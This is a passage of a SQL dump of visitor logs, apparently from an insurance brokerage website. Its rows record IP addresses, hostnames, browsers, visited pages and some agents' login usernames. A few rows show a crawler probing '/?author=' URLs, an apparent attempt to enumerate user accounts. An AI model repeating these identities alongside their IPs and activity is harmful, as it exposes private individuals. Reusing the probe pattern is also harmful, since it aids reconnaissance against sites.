Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(10454,'0b_eed7ce6f33248a4852cfd9886259e44a','1459350298','184.154.139.23','placeholder.sitelock.com','/about-us/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(10457,'0b_eed7ce6f33248a4852cfd9886259e44a','1459350300','184.154.139.23','placeholder.sitelock.com','/forms/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(10458,'0b_eed7ce6f33248a4852cfd9886259e44a','1459350306','184.154.139.23','placeholder.sitelock.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(10460,'0b_eed7ce6f33248a4852cfd9886259e44a','1459350312','184.154.139.23','placeholder.sitelock.com','/contact/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(10461,'0b_3a4848c2bfd34df0777c6992659d13e8','1459351534','207.244.97.183','exit.manassas.tor-node.net','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36','http://burger-imperia.com/','',0,'Linux','Chrome 37','','','','','','','','2','0',0),(10464,'0b_3db97601cf33346c01d39d116aa6e4b9','1459354163','207.46.13.190','msnbot-207-46-13-190.search.msn.com','/agent-tools/','Mozilla/5.0 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(10466,'0b_f22ba6a6e03d025b6176ace6dd87fd3c','1459354331','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(10469,'0b_f22ba6a6e03d025b6176ace6dd87fd3c','1459354333','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(10470,'0b_07553932cd7735d727ab310df2cbf42f','1459354432','66.249.73.178','crawl-66-249-73-178.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(10473,'0b_f22ba6a6e03d025b6176ace6dd87fd3c','1459354483','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(10475,'0b_f22ba6a6e03d025b6176ace6dd87fd3c','1459354484','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(10476,'0b_aec9d219d29fe2d9d5fe9618277bcc18','1459355187','68.204.86.185','68-204-86-185.res.bhn.net','/','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0ahUKEwi54qTU6ejLAhXFNiYKHRzpCcUQFggwMAM&url=http%3A%2F%2Fwww.empireins.com%2F&usg=AFQjCNEqpoINuZ9iLoJwjv1SXIp20w_BCg&sig2=XLoCxQNIQpSWA6_mpHqB6A&bvm=bv.117868183,d.eWE','',0,'Win10','','us','1600 x 900','','','','','','0','0',0),(10478,'0b_aec9d219d29fe2d9d5fe9618277bcc18','1459355189','68.204.86.185','68-204-86-185.res.bhn.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win10','','us','1600 x 900','','','','','','0','0',0),(10479,'0b_aec9d219d29fe2d9d5fe9618277bcc18','1459355194','68.204.86.185','68-204-86-185.res.bhn.net','/about-us/','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win10','','us','1600 x 900','','','','','','0','0',0),(10482,'0b_aec9d219d29fe2d9d5fe9618277bcc18','1459355200','68.204.86.185','68-204-86-185.res.bhn.net','/contact/','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/about-us/','',0,'Win10','','us','1600 x 900','','','','','','0','51',0),(10485,'0b_a449ad8a727415c0003d4423b7dbef4e','1459356474','213.251.184.38','ns322237.ip-213-251-184.eu','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(10487,'0b_a449ad8a727415c0003d4423b7dbef4e','1459356477','213.251.184.38','ns322237.ip-213-251-184.eu','/companylinks.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(10490,'0b_d5eea961bf142234c4726726aeca5674','1459356555','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(10493,'0b_095033335dedb71bd56492bd6335817c','1459356561','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','0',0),(10496,'0b_095033335dedb71bd56492bd6335817c','1459356568','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(10497,'0b_095033335dedb71bd56492bd6335817c','1459356572','75.99.37.250','ool-4b6325fa.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(10500,'0b_fd88952fca48492e2045fe9d6bde2f84','1459358589','207.46.13.190','msnbot-207-46-13-190.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(10503,'0b_fd88952fca48492e2045fe9d6bde2f84','1459358593','207.46.13.190','msnbot-207-46-13-190.search.msn.com','/under.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(10506,'0b_295c0487b4a0593e4c2aa9c189f69ab1','1459360041','173.220.69.210','ool-addc45d2.static.optonline.net','/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win10','Chrome 49','us','1680 x 1050','','','','','','0','0',0),(10508,'0b_295c0487b4a0593e4c2aa9c189f69ab1','1459360044','173.220.69.210','ool-addc45d2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win10','Chrome 49','us','1680 x 1050','','','','','','0','0',0),(10511,'0b_295c0487b4a0593e4c2aa9c189f69ab1','1459360049','173.220.69.210','ool-addc45d2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win10','Chrome 49','us','1680 x 1050','','','','','','0','0',0),(10514,'0b_5434f6efa0a505c6b216dd24aa22f7e1','1459360070','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(10517,'0b_5434f6efa0a505c6b216dd24aa22f7e1','1459360071','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(10520,'0b_5434f6efa0a505c6b216dd24aa22f7e1','1459360075','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(10523,'0b_5434f6efa0a505c6b216dd24aa22f7e1','1459360083','108.58.88.178','ool-6c3a58b2.static.optonline.net','/underwriting-cheat-sheets/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','51',0),(10526,'0b_295c0487b4a0593e4c2aa9c189f69ab1','1459360099','173.220.69.210','ool-addc45d2.static.optonline.net','/underwriting-search/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win10','Chrome 49','us','1680 x 1050','','','','imayer','','0','51',0),(10527,'0b_dc16f220134a38a5ec01fd21d0264971','1459360194','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(10530,'0b_dc16f220134a38a5ec01fd21d0264971','1459360195','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(10532,'0b_295c0487b4a0593e4c2aa9c189f69ab1','1459360249','173.220.69.210','ool-addc45d2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win10','Chrome 49','us','1680 x 1050','','','','imayer','','0','51',0),(10535,'0b_64763378a3b6228eb7822063a73942cd','1459360418','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(10538,'0b_d2f893683c46e18e218697c65b759722','1459360515','207.46.13.106','msnbot-207-46-13-106.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(10539,'0b_d2f893683c46e18e218697c65b759722','1459360519','207.46.13.106','msnbot-207-46-13-106.search.msn.com','/register/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(10541,'0b_fac572f28b86ac118085a171f44efa01','1459360535','50.108.156.48','50.108.156.48','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','0',0),(10544,'0b_fac572f28b86ac118085a171f44efa01','1459360546','50.108.156.48','50.108.156.48','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','0',0),(10545,'0b_fac572f28b86ac118085a171f44efa01','1459360573','50.108.156.48','50.108.156.48','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','0',0),(10548,'0b_fac572f28b86ac118085a171f44efa01','1459360594','50.108.156.48','50.108.156.48','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','51',0),(10550,'0b_7adf939f717a60ea2f14436a31e3a979','1459361595','107.202.43.140','107-202-43-140.lightspeed.frokca.sbcglobal.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(10551,'0b_7adf939f717a60ea2f14436a31e3a979','1459361597','107.202.43.140','107-202-43-140.lightspeed.frokca.sbcglobal.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(10553,'0b_7adf939f717a60ea2f14436a31e3a979','1459361625','107.202.43.140','107-202-43-140.lightspeed.frokca.sbcglobal.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(10556,'0b_7adf939f717a60ea2f14436a31e3a979','1459361626','107.202.43.140','107-202-43-140.lightspeed.frokca.sbcglobal.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(10557,'0b_7adf939f717a60ea2f14436a31e3a979','1459361631','107.202.43.140','107-202-43-140.lightspeed.frokca.sbcglobal.net','/about-us/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(10559,'0b_7adf939f717a60ea2f14436a31e3a979','1459361636','107.202.43.140','107-202-43-140.lightspeed.frokca.sbcglobal.net','/meet-the-eib-team/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/about-us/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(10560,'0b_abf4d18e401d9dfa3896759ebbf2deb5','1459361801','75.99.37.250','ool-4b6325fa.static.optonline.net','/underwriting-cheat-sheets/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(10563,'0b_abf4d18e401d9dfa3896759ebbf2deb5','1459361909','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/underwriting-cheat-sheets/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(10565,'0b_abf4d18e401d9dfa3896759ebbf2deb5','1459361928','75.99.37.250','ool-4b6325fa.static.optonline.net','/underwriting-cheat-sheets/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(10566,'0b_6b644789d3f1ab3af306cbd265cdde8e','1459362273','67.85.210.17','ool-4355d211.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win8','Chrome 49','us','','','','','','','0','0',0),(10568,'0b_6b644789d3f1ab3af306cbd265cdde8e','1459362274','67.85.210.17','ool-4355d211.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 49','us','','','','','','','0','0',0),(10569,'0b_84fb94448e9c42c26af06568b857b566','1459362411','207.46.13.98','msnbot-207-46-13-98.search.msn.com','/products.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(10572,'0b_fac572f28b86ac118085a171f44efa01','1459363666','50.108.156.48','50.108.156.48','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','51',0),(10575,'0b_fac572f28b86ac118085a171f44efa01','1459363668','50.108.156.48','50.108.156.48','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','0',0),(10578,'0b_fac572f28b86ac118085a171f44efa01','1459363678','50.108.156.48','50.108.156.48','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','51',0),(10580,'0b_fac572f28b86ac118085a171f44efa01','1459363688','50.108.156.48','50.108.156.48','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','51',0),(10581,'0b_43aeda82334577e512582e68174ae066','1459364163','208.115.111.66','208-115-111-66-reverse.wowrack.com','/forms/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(10583,'0b_fac572f28b86ac118085a171f44efa01','1459364232','50.108.156.48','50.108.156.48','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','51',0),(10584,'0b_fac572f28b86ac118085a171f44efa01','1459364234','50.108.156.48','50.108.156.48','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','0',0),(10587,'0b_fac572f28b86ac118085a171f44efa01','1459364254','50.108.156.48','50.108.156.48','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','51',0),(10590,'0b_fac572f28b86ac118085a171f44efa01','1459364262','50.108.156.48','50.108.156.48','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','51',0),(10593,'0b_8aa5612175d3a5a71e81b73dd3d7dc2a','1459365145','157.56.2.203','msnbot-157-56-2-203.search.msn.com','/robots.txt','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36 (BingLocalSearch)','','',0,'Win8','Google Chrome','','','','BingBot','','','','0','0',0),(10595,'0b_8aa5612175d3a5a71e81b73dd3d7dc2a','1459365146','157.56.2.203','msnbot-157-56-2-203.search.msn.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36 (BingLocalSearch)','','',0,'Win8','Google Chrome','','','','BingBot','','','','0','0',0),(10598,'0b_8aa5612175d3a5a71e81b73dd3d7dc2a','1459365148','157.56.2.203','msnbot-157-56-2-203.search.msn.com','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36 (BingLocalSearch)','','',0,'Win8','Google Chrome','','','','BingBot','','','','0','0',0),(10599,'0b_f5b8bac6dcd09e28fe37f4e73e96f78e','1459366015','194.145.208.142','194.145.208.142','/?author=0','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(10601,'0b_f5b8bac6dcd09e28fe37f4e73e96f78e','1459366017','194.145.208.142','194.145.208.142','/?author=1','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(10604,'0b_f5b8bac6dcd09e28fe37f4e73e96f78e','1459366025','194.145.208.142','194.145.208.142','/?author=4','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(10605,'0b_86d27c29bf07e0730ec11a628e8c87fd','1459366717','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/underwriting-cheat-sheets/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','0',0),(10607,'0b_86d27c29bf07e0730ec11a628e8c87fd','1459366732','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','51',0),(10610,'0b_afd028d6f7b51bfda6a5c484f04bfa65','1459367040','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(10613,'0b_afd028d6f7b51bfda6a5c484f04bfa65','1459367041','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(10614,'0b_afd028d6f7b51bfda6a5c484f04bfa65','1459367062','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(10617,'0b_afd028d6f7b51bfda6a5c484f04bfa65','1459367063','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(10620,'0b_ba705f315073751f981dc1851589abd6','1459367482','141.8.143.242','spider-141-8-143-242.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(10622,'0b_ff4757a5be2dc056c2e5e89e53d52481','1459367601','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','[404] /favicon.gif','Mozilla/4.0 (compatible; GoogleToolbar 7.5.7210.1528; Windows 6.1; MSIE 9.0.8112.16421)','','',0,'','Netscape 4','','','','','','','','0','0',0),(10625,'0b_af99086e98957ee9e6cb6bc04fc4bf5c','1459367618','74.108.97.66','static-74-108-97-66.nycmny.fios.verizon.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 49','us','1920 x 1080','Google','','','','','0','0',0),(10626,'0b_af99086e98957ee9e6cb6bc04fc4bf5c','1459367620','74.108.97.66','static-74-108-97-66.nycmny.fios.verizon.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(10628,'0b_af99086e98957ee9e6cb6bc04fc4bf5c','1459367639','74.108.97.66','static-74-108-97-66.nycmny.fios.verizon.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(10629,'0b_af99086e98957ee9e6cb6bc04fc4bf5c','1459367668','74.108.97.66','static-74-108-97-66.nycmny.fios.verizon.net','/carriers/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(10631,'0b_af99086e98957ee9e6cb6bc04fc4bf5c','1459367682','74.108.97.66','static-74-108-97-66.nycmny.fios.verizon.net','/about-us/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/carriers/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(10634,'0b_af99086e98957ee9e6cb6bc04fc4bf5c','1459367689','74.108.97.66','static-74-108-97-66.nycmny.fios.verizon.net','/meet-the-eib-team/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/about-us/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(10635,'0b_af99086e98957ee9e6cb6bc04fc4bf5c','1459367708','74.108.97.66','static-74-108-97-66.nycmny.fios.verizon.net','/carriers/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/meet-the-eib-team/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(10638,'0b_af99086e98957ee9e6cb6bc04fc4bf5c','1459367710','74.108.97.66','static-74-108-97-66.nycmny.fios.verizon.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/carriers/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(10640,'0b_af99086e98957ee9e6cb6bc04fc4bf5c','1459367712','74.108.97.66','static-74-108-97-66.nycmny.fios.verizon.net','/licensing-contracting/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(10643,'0b_af99086e98957ee9e6cb6bc04fc4bf5c','1459367715','74.108.97.66','static-74-108-97-66.nycmny.fios.verizon.net','/insentives/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 